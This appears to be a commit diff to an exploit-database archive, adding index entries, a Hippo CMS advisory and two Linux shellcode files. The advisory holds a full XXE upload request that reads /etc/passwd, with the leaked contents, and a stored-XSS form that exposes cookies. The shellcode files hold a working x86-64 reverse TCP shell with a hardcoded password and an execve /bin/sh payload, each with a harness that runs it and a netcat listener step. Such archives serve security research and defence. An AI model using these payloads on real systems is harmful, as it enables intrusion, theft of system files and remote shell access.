SLAE-R
diff --git a/‎files.csv‎
Lines changed: 11 additions & 0 deletions b/‎files.csv‎
Lines changed: 11 additions & 0 deletions
diff --git a/‎platforms/java/webapps/39391.txt‎
Lines changed: 179 additions & 0 deletions b/‎platforms/java/webapps/39391.txt‎
Lines changed: 179 additions & 0 deletions
diff --git a/‎platforms/lin_x86-64/shellcode/39388.c‎
Lines changed: 113 additions & 0 deletions b/‎platforms/lin_x86-64/shellcode/39388.c‎
Lines changed: 113 additions & 0 deletions
diff --git a/‎platforms/lin_x86-64/shellcode/39390.c‎
Lines changed: 52 additions & 0 deletions b/‎platforms/lin_x86-64/shellcode/39390.c‎
Lines changed: 52 additions & 0 deletions
@@ -32489,6 +32489,7 @@ id,file,description,date,author,platform,type,port
 36036,platforms/php/webapps/36036.txt,"BlueSoft Rate My Photo Site 'ty' Parameter SQL Injection Vulnerability",2011-08-08,darkTR,php,webapps,0
 36037,platforms/multiple/dos/36037.txt,"Adobe Flash Media Server <= 4.0.2 NULL Pointer Dereference Remote Denial of Service Vulnerability",2011-08-09,"Knud Erik Hojgaard",multiple,dos,0
 36038,platforms/php/webapps/36038.txt,"WordPress eShop Plugin 6.2.8 - Multiple Cross Site Scripting Vulnerabilities",2011-08-10,"High-Tech Bridge SA",php,webapps,0
+39386,platforms/php/webapps/39386.txt,"iScripts EasyCreate 3.0 - Multiple Vulnerabilities",2016-02-01,"Bikramaditya Guha",php,webapps,80
 36042,platforms/hardware/webapps/36042.txt,"LG DVR LE6016D - Remote File Disclosure Vulnerability",2015-02-10,"Yakir Wizman",hardware,webapps,0
 36043,platforms/php/webapps/36043.rb,"WordPress WP EasyCart - Unrestricted File Upload",2015-02-10,metasploit,php,webapps,80
 36044,platforms/php/webapps/36044.txt,"PHP Flat File Guestbook 1.0 - 'ffgb_admin.php' Remote File Include Vulnerability",2011-08-11,"RiRes Walid",php,webapps,0
@@ -35625,3 +35626,13 @@ id,file,description,date,author,platform,type,port
 39382,platforms/multiple/webapps/39382.txt,"SAP HANA 1.00.095 - hdbindexserver Memory Corruption",2016-01-28,ERPScan,multiple,webapps,0
 39383,platforms/lin_x86-64/shellcode/39383.c,"x86_64 Linux shell_reverse_tcp with Password - Polymorphic Version",2016-01-29,"Sathish kumar",lin_x86-64,shellcode,0
 39385,platforms/php/webapps/39385.txt,"ProjectSend r582 - Multiple Vulnerabilities",2016-01-29,"Filippo Cavallarin",php,webapps,80
+39387,platforms/php/webapps/39387.py,"iScripts EasyCreate 3.0 - Remote Code Execution Exploit",2016-02-01,"Bikramaditya Guha",php,webapps,80
+39388,platforms/lin_x86-64/shellcode/39388.c,"x86_64 Linux shell_reverse_tcp with Password - Polymorphic Version v2",2016-02-01,"Sathish kumar",lin_x86-64,shellcode,0
+39389,platforms/lin_x86/shellcode/39389.c,"Linux x86 Download & Execute Shellcode",2016-02-01,B3mB4m,lin_x86,shellcode,0
+39390,platforms/lin_x86-64/shellcode/39390.c,"x86_64 Linux Polymorphic Execve-Stack - 47 bytes",2016-02-01,"Sathish kumar",lin_x86-64,shellcode,0
+39391,platforms/java/webapps/39391.txt,"Hippo CMS 10.1 - Multiple Vulnerabilities",2016-02-01,LiquidWorm,java,webapps,80
+39393,platforms/windows/dos/39393.txt,"Autonics DAQMaster 1.7.3 - DQP Parsing Buffer Overflow Code Execution",2016-02-01,LiquidWorm,windows,dos,0
+39395,platforms/windows/dos/39395.txt,"WPS Office < 2016 - .ppt Heap Memory Corruption",2016-02-01,"Francis Provencher",windows,dos,0
+39396,platforms/windows/dos/39396.txt,"WPS Office < 2016 - .doc OneTableDocumentStream Memory Corruption",2016-02-01,"Francis Provencher",windows,dos,0
+39397,platforms/windows/dos/39397.txt,"WPS Office < 2016 - .ppt drawingContainer Memory Corruption",2016-02-01,"Francis Provencher",windows,dos,0
+39398,platforms/windows/dos/39398.txt,"WPS Office < 2016 - .xls Heap Memory Corruption",2016-02-01,"Francis Provencher",windows,dos,0
@@ -0,0 +1,179 @@
+
+Hippo CMS 10.1 XML External Entity Information Disclosure Vulnerability
+
+
+Vendor: Hippo B.V.
+Product web page: http://www.onehippo.org
+Affected version: 10.1, 7.9 and 7.8 (Enterprise Edition)
+
+Summary: Hippo CMS is an open source Java CMS. We built it so you
+can easily integrate it into your existing architecture.
+
+Desc: XXE (XML External Entity) processing through upload of SVG
+images in the CMS, and through XML import in the CMS Console application.
+
+Tested on: Linux 2.6.32-5-xen-amd64
+           Java/1.8.0_66
+           Apache-Coyote/1.1
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+                            @zeroscience
+
+
+Advisory ID: ZSL-2016-5301
+Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5301.php
+
+Vendor: http://www.onehippo.org/security-issues-list/security-12.html
+        http://www.onehippo.org/about/release-notes/10/10.1.2-release-notes.html
+
+
+04.12.2015
+
+---
+
+
+[Request]:
+
+
+POST /?1-8.IBehaviorListener.0-root-tabs-panel~container-cards-2-panel-center-tabs-panel~container-cards-3-panel-editor-extension.editor-form-template-view-3-item-view-1-item-extension.upload-fileUpload-form-fileUpload HTTP/1.1
+Host: 10.0.2.17
+User-Agent: ZSL_Web_Scanner/2.8
+Accept: application/json, text/javascript, */*; q=0.01
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+X-Requested-With: XMLHttpRequest
+Referer: https://10.0.2.17/?1&path=/content/gallery/test4.svg
+Content-Length: 2101
+Content-Type: multipart/form-data; boundary=---------------------------20443294602274
+Cookie: [OMMITED]
+Connection: keep-alive
+Pragma: no-cache
+Cache-Control: no-cache
+
+
+-----------------------------20443294602274
+Content-Disposition: form-data; name="id1a0_hf_0"
+
+
+-----------------------------20443294602274
+Content-Disposition: form-data; name="cards:3:panel:editor:extension.editor:form:template:view:1:item
+:view:1:item:value:widget"
+
+
+-----------------------------20443294602274
+Content-Disposition: form-data; name="cards:3:panel:editor:extension.editor:form:template:view:2:item
+:view:1:item:view:1:item:view:1:item:value:widget"
+
+
+-----------------------------20443294602274
+Content-Disposition: form-data; name="cards:3:panel:editor:extension.editor:form:template:view:2:item
+:view:1:item:view:2:item:view:1:item:value:widget"
+
+
+-----------------------------20443294602274
+Content-Disposition: form-data; name="cards:1:panel:editor:extension.editor:form:template:extension.left
+:view:1:item:view:1:item:value:widget"
+
+asd
+-----------------------------20443294602274
+Content-Disposition: form-data; name="cards:1:panel:editor:extension.editor:form:template:extension.left
+:view:2:item:view:1:item:value:widget"
+
+hhh
+-----------------------------20443294602274
+Content-Disposition: form-data; name="cards:1:panel:editor:extension.editor:form:template:extension.left
+:view:3:item:view:1:item:panel:editor"
+
+
+-----------------------------20443294602274
+Content-Disposition: form-data; name="cards:1:panel:editor:extension.editor:form:template:extension.right
+:view:2:item:view:1:item:value:widget"
+
+hhh
+-----------------------------20443294602274
+Content-Disposition: form-data; name="cards:1:panel:editor:extension.editor:form:template:extension.right
+:view:3:item:view:1:item:value:widget"
+
+hhhh
+-----------------------------20443294602274
+Content-Disposition: form-data; name="files[]"; filename="svgupload2.svg"
+Content-Type: image/svg+xml
+
+<?xml version="1.0" standalone="yes"?><!DOCTYPE zsl [ <!ENTITY xxe SYSTEM "file:///etc/passwd" > ]
+><svg width="500px" height="40px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999
+/xlink" version="1.1">&xxe;</svg>
+-----------------------------20443294602274--
+
+
+
+[Response]:
+
+
+<?xml version="1.0" encoding="UTF-8"?><svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www
+.w3.org/1999/xlink" height="7" version="1.1" viewBox="0 0 500.0 40.0" width="98">
+root:x:0:0:root:/root:/bin/bash
+daemon:x:1:1:daemon:/usr/sbin:/bin/sh
+bin:x:2:2:bin:/bin:/bin/sh
+sys:x:3:3:sys:/dev:/bin/sh
+sync:x:4:65534:sync:/bin:/bin/sync
+***
+***
+***
+***
+</svg>
+
+###############################################################################
+
+<!--
+
+Hippo CMS 10.1 Stored Cross-Site Scripting Vulnerability
+
+
+Vendor: Hippo B.V.
+Product web page: http://www.onehippo.org
+Affected version: 10.1, 7.9 and 7.8 (Enterprise Edition)
+
+Summary: Hippo CMS is an open source Java CMS. We
+built it so you can easily integrate it into your
+existing architecture.
+
+Desc: Hippo CMS suffers from a stored XSS vulnerability.
+Input passed thru the POST parameters 'groupname' and
+'description' is not sanitized allowing the attacker to
+execute HTML code into user's browser session on the
+affected site.
+
+
+Tested on: Linux 2.6.32-5-xen-amd64
+           Java/1.8.0_66
+           Apache-Coyote/1.1
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+                            @zeroscience
+
+
+Advisory ID: ZSL-2016-5300
+Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5300.php
+
+Vendor: http://www.onehippo.org/security-issues-list/security-12.html
+        http://www.onehippo.org/about/release-notes/10/10.1.2-release-notes.html
+
+
+04.12.2015
+
+-->
+
+
+<html>
+ <body>
+  <form action="https://10.0.2.17/?1-1.IBehaviorListener.0-root-tabs-panel~container-cards-6-panel-panel-form-create~button" method="POST">
+   <input type="hidden" name="id26c_hf_0" value="" />
+   <input type="hidden" name="groupname" value="<img src=ko onerror=confirm(document.cookie)>" />
+   <input type="hidden" name="description" value="<img src=ko onerror=confirm(2)>" />
+   <input type="hidden" name="create-button" value="1" />
+   <input type="submit" value="Inject code" />
+  </form>
+ </body>
+</html>
@@ -0,0 +1,113 @@
+/*---------------------------------------------------------------------------------------------------------------------
+/*
+*Title:            tcp reverse shell with password polymorphic version v2 135 bytes
+*Author:           Sathish kumar
+*Contact:          https://www.linkedin.com/in/sathish94
+*Copyright:        (c) 2016 iQube. (http://iQube.io)
+*Release Date:     January 29, 2016
+*Description:      x64 Linux reverse TCP port shellcode on port 4444 with reconfigurable password
+*Tested On:        Ubuntu 14.04 LTS
+*SLAE64-1408
+*Build/Run:        gcc -fno-stack-protector -z execstack filename.c -o filename
+*                   ./bindshell
+*                   nc -l 4444 -vvv
+* 
+
+global _start
+
+_start:
+    
+    xor rax, rax    ;Xor function will null the values in the register beacuse we doesn't know whats the value in the register in realtime cases
+	xor rsi, rsi 
+	mul rsi
+	push byte 0x2   ;pusing argument to the stack
+	pop rdi         ; poping the argument to the rdi instructions on the top of the stack should be remove first because stack LIFO
+	inc esi         ; already rsi is 0 so incrementing the rsi register will make it 1
+	push byte 0x29  ; pushing the syscall number into the rax by using stack
+	pop rax
+	syscall
+	
+	; copying the socket descripter from rax to rdi register so that we can use it further 
+
+	xchg rax, rdi
+	
+	; server.sin_family = AF_INET 
+	; server.sin_port = htons(PORT)
+	; server.sin_addr.s_addr = INADDR_ANY
+	; bzero(&server.sin_zero, 8)
+	; setting up the data sctructure
+	
+	xor rax, rax
+	push rax                         ; bzero(&server.sin_zero, 8)
+	mov ebx , 0xfeffff80             ; ip address 127.0.0.1 "noted" to remove null
+	not ebx
+	mov dword [rsp-4], ebx
+	sub rsp , 4                      ; adjust the stack
+	xor r9, r9
+	push word 0x5c11                 ; port 4444 in network byte order
+	push word 0x02                   ; AF_INET
+	push rsp
+	pop rsi
+	
+	
+	push 0x10
+	pop rdx
+	push 0x2a
+	pop rax
+	syscall
+	
+	push 0x3                           
+	pop rsi								; setting argument to 3 
+
+
+
+duplicate:
+    dec esi                            
+    mov al, 0x21                       ;duplicate syscall applied to error,output and input using loop
+    syscall
+    jne duplicate
+    
+password_check:
+	
+	push rsp
+	pop rsi
+	xor rax, rax   ; system read syscall value is 0 so rax is set to 0
+	syscall
+	push 0x6b636168 ; password to connect to shell is hack which is pushed in reverse and hex encoded
+	pop rax
+	lea rdi, [rel rsi]
+	scasd           ; comparing the user input and stored password in the stack
+	
+	
+execve:                                      
+    xor esi, esi
+    xor r15, r15
+    mov r15w, 0x161f
+    sub r15w, 0x1110
+    push r15
+    mov r15, rsp
+    mov rdi, 0xff978cd091969dd0
+    inc rdi
+    neg rdi
+    mul esi
+    add al, 0x3b
+    push rdi
+    push rsp
+    pop rdi
+    call r15
+
+
+*/
+#include <stdio.h>
+#include <string.h>
+
+unsigned char code[] =\
+"\x48\x31\xc0\x48\x31\xf6\x48\xf7\xe6\x6a\x02\x5f\xff\xc6\x6a\x29\x58\x0f\x05\x48\x97\x48\x31\xc0\x50\xbb\x80\xff\xff\xfe\xf7\xd3\x89\x5c\x24\xfc\x48\x83\xec\x04\x4d\x31\xc9\x66\x68\x11\x5c\x66\x6a\x02\x54\x5e\x6a\x10\x5a\x6a\x2a\x58\x0f\x05\x6a\x03\x5e\xff\xce\xb0\x21\x0f\x05\x75\xf8\x54\x5e\x48\x31\xc0\x0f\x05\x68\x68\x61\x63\x6b\x58\x48\x8d\x3e\xaf\x31\xf6\x4d\x31\xff\x66\x41\xbf\x1f\x16\x66\x41\x81\xef\x10\x11\x41\x57\x49\x89\xe7\x48\xbf\xd0\x9d\x96\x91\xd0\x8c\x97\xff\x48\xff\xc7\x48\xf7\xdf\xf7\xe6\x04\x3b\x57\x54\x5f\x41\xff\xd7";
+
+main()
+{
+   printf("Shellcode Length: %d\n", (int)strlen(code));
+   int (*ret)() = (int(*)())code;
+   ret();
+}
+
@@ -0,0 +1,52 @@
+/*---------------------------------------------------------------------------------------------------------------------
+/*
+*Title:            x86_64 linux Polymorphic execve-stack 47 bytes
+*Author:           Sathish kumar
+*Contact:          https://www.linkedin.com/in/sathish94
+* Copyright:       (c) 2016 iQube. (http://iQube.io)
+* Release Date:    January 6, 2016
+*Description:      X86_64 linux Polymorphic execve-stack 47 bytes
+*Tested On:        Ubuntu 14.04 LTS
+*SLAE64-1408
+*Build/Run:        gcc -fno-stack-protector -z execstack sellcode.c -o shellcode
+*                   ./shellcode
+*                   
+global _start
+
+_start:
+
+    xor esi, esi
+    xor r15, r15
+    mov r15w, 0x161f
+    sub r15w, 0x1110
+    push r15
+    mov r15, rsp
+    mov rdi, 0xff978cd091969dd0
+    inc rdi
+    neg rdi
+    mul esi
+    add al, 0x3b
+    push rdi
+    push rsp
+    pop rdi
+    call r15
+*/
+
+
+#include<stdio.h>
+#include<string.h>
+
+unsigned char code[] = \
+"\x31\xf6\x4d\x31\xff\x66\x41\xbf\x1f\x16\x66\x41\x81\xef\x10\x11\x41\x57\x49\x89\xe7\x48\xbf\xd0\x9d\x96\x91\xd0\x8c\x97\xff\x48\xff\xc7\x48\xf7\xdf\xf7\xe6\x04\x3b\x57\x54\x5f\x41\xff\xd7";
+main()
+{
+
+	printf("Shellcode Length:  %d\n", (int)strlen(code));
+
+	int (*ret)() = (int(*)())code;
+
+	ret();
+
+}
+
+